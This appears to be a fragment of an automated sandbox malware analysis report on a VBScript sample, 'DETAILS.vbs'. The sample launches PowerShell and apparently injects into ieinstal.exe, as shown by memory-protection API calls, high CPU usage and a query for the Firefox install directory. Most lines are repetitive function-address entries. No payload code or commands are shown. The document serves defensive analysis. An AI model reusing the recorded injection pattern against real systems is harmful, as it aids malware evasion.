            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082630503_2_08263050
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082646A03_2_082646A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082646A03_2_082646A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08262CF83_2_08262CF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0826EF203_2_0826EF20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0826EF123_2_0826EF12
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082690C83_2_082690C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0826D1883_2_0826D188
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0826EF203_2_0826EF20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083C73103_2_083C7310
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083C001E3_2_083C001E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083C00403_2_083C0040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_083C73003_2_083C7300
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_084218203_2_08421820
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_084237E33_2_084237E3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_084237F03_2_084237F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_084804483_2_08480448
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_08498E683_2_08498E68
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0849248C3_2_0849248C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_0849A5F13_2_0849A5F1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_082690B83_2_082690B8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04D1AA589_2_04D1AA58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04D1EAF09_2_04D1EAF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04D1EAE09_2_04D1EAE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04D1AA389_2_04D1AA38
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B936189_2_07B93618
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B904489_2_07B90448
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B9E8609_2_07B9E860
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B904399_2_07B90439
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B96F739_2_07B96F73
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B96EE89_2_07B96EE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_07B9E8609_2_07B9E860
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08152E119_2_08152E11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081532109_2_08153210
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081517B29_2_081517B2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08157A289_2_08157A28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08152E119_2_08152E11
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081513A29_2_081513A2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C2E5A9_2_081C2E5A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C1F289_2_081C1F28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C14809_2_081C1480
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C4BF09_2_081C4BF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C4BE99_2_081C4BE9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_081C1F189_2_081C1F18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08298C329_2_08298C32
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08298C409_2_08298C40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_082900249_2_08290024
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_082900409_2_08290040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0898AA089_2_0898AA08
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08988F489_2_08988F48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0898EF409_2_0898EF40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_0898E8409_2_0898E840
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08985B609_2_08985B60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089837BA9_2_089837BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089837C09_2_089837C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A2B509_2_089A2B50
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089A2C489_2_089A2C48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089BD3809_2_089BD380
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B23C89_2_089B23C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B94809_2_089B9480
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B9CA89_2_089B9CA8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B7C589_2_089B7C58
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089BCDF89_2_089BCDF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089BA5289_2_089BA528
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089BC6809_2_089BC680
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089BB6009_2_089BB600
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089B8E789_2_089B8E78
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089DECA89_2_089DECA8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089D08209_2_089D0820
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089D00409_2_089D0040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089DAEE09_2_089DAEE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089DF7A09_2_089DF7A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089FEBD09_2_089FEBD0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089FA3A89_2_089FA3A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089FD0A89_2_089FD0A8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089F00409_2_089F0040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_08157A1A9_2_08157A1A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_089AD5A19_2_089AD5A1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_049C8FF813_2_049C8FF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_049C8FEB13_2_049C8FEB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_049CE89013_2_049CE890
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_049CE8C013_2_049CE8C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07EDBEE013_2_07EDBEE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07EDBEF013_2_07EDBEF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07ED9A3813_2_07ED9A38
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07ED882813_2_07ED8828
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07FA639013_2_07FA6390
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07FA1F0013_2_07FA1F00
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07FA638113_2_07FA6381
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_07FA1EF013_2_07FA1EF0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08058C1813_2_08058C18
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08058C4013_2_08058C40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0805000613_2_08050006
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0805004013_2_08050040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080E8E4813_2_080E8E48
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080EEE4013_2_080EEE40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080E5A6013_2_080E5A60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080E367113_2_080E3671
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_080E36C013_2_080E36C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0813384013_2_08133840
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0813386813_2_08133868
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0814CE6313_2_0814CE63
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0814EFA813_2_0814EFA8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0814E43A13_2_0814E43A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0814EF9C13_2_0814EF9C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0814961013_2_08149610
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_081589A013_2_081589A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0815D27013_2_0815D270
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08153CB813_2_08153CB8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0815C99813_2_0815C998
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0815A20813_2_0815A208
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0815F7E013_2_0815F7E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_08760C2013_2_08760C20
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0876004013_2_08760040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0879BC4013_2_0879BC40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0879BC3013_2_0879BC30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_0879346013_2_08793460
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087AE12813_2_087AE128
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087A398013_2_087A3980
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087AB26813_2_087AB268
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087A921813_2_087A9218
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087ABAE813_2_087ABAE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 13_2_087A008113_2_087A0081
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0479900814_2_04799008
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04798FF914_2_04798FF9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04798FC014_2_04798FC0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0479E95014_2_0479E950
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_081B8C3014_2_081B8C30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_081B8C2214_2_081B8C22
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_081B001514_2_081B0015
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_081B000614_2_081B0006
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_081B004014_2_081B0040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0827347814_2_08273478
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0827348814_2_08273488
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0862F83014_2_0862F830
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0862C9C014_2_0862C9C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0862C9C814_2_0862C9C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0862EB0814_2_0862EB08
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086959E814_2_086959E8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0869000614_2_08690006
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0869EB6014_2_0869EB60
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086933C814_2_086933C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086933D814_2_086933D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0869CC4014_2_0869CC40
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086F895014_2_086F8950
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086F740814_2_086F7408
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086F94A014_2_086F94A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086F2E0814_2_086F2E08
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086F526014_2_086F5260
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086FF2A014_2_086FF2A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086FC3E814_2_086FC3E8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_086FACA814_2_086FACA8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_08700BD014_2_08700BD0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0870004014_2_08700040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_08794C9814_2_08794C98
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0879004014_2_08790040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087938F814_2_087938F8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_08792A0914_2_08792A09
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0879331814_2_08793318
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DF22014_2_087DF220
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DC2E814_2_087DC2E8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087D4B6814_2_087D4B68
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DDCE014_2_087DDCE0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087D5C8814_2_087D5C88
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DE56014_2_087DE560
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DCE2814_2_087DCE28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087D876814_2_087D8768
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087DAF2814_2_087DAF28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087D77D814_2_087D77D8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087F43F014_2_087F43F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087FECB014_2_087FECB0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087FECB014_2_087FECB0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087F1A2814_2_087F1A28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087F3AE814_2_087F3AE8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0880FABB14_2_0880FABB
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0880C6E014_2_0880C6E0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0880B5E814_2_0880B5E8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0881004014_2_08810040
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_088100F014_2_088100F0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0881106014_2_08811060
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_088131B114_2_088131B1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_088131C014_2_088131C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_088131C014_2_088131C0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_0896F0C814_2_0896F0C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_087D008114_2_087D0081
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D28AC719_2_02D28AC7
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D24E8A19_2_02D24E8A
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D254C219_2_02D254C2
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D250F319_2_02D250F3
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2086B19_2_02D2086B
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2A21619_2_02D2A216
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D24B7819_2_02D24B78
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2A36819_2_02D2A368
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2473C19_2_02D2473C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03004E8A20_2_03004E8A
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03008AC720_2_03008AC7
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300473C20_2_0300473C
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300A36820_2_0300A368
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03004B7820_2_03004B78
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300A21620_2_0300A216
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300086B20_2_0300086B
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_030054C220_2_030054C2
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_030050F320_2_030050F3
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: String function: 087D28A0 appears 40 times
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_00B8BB70 NtProtectVirtualMemory,7_2_00B8BB70
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_00B8BAE2 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,7_2_00B8BAE2
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_00B8BB69 NtProtectVirtualMemory,7_2_00B8BB69
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D23CF4 NtSetInformationProcess,19_2_02D23CF4
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D24E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,19_2_02D24E8A
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D2AD58 NtProtectVirtualMemory,19_2_02D2AD58
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_02D24E83 NtProtectVirtualMemory,19_2_02D24E83
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_0300AD58 NtProtectVirtualMemory,20_2_0300AD58
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03004E8A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LoadLibraryA,NtProtectVirtualMemory,20_2_03004E8A
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03003CF4 NtSetInformationProcess,20_2_03003CF4
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 20_2_03004E83 NtProtectVirtualMemory,20_2_03004E83
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeProcess Stats: CPU usage > 98%
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\91.0.1 (x64 en-GB)\Main Install DirectoryJump to behavior
            Source: DETAILS.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dll
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
            Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dll
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\DETAILS.vbs"
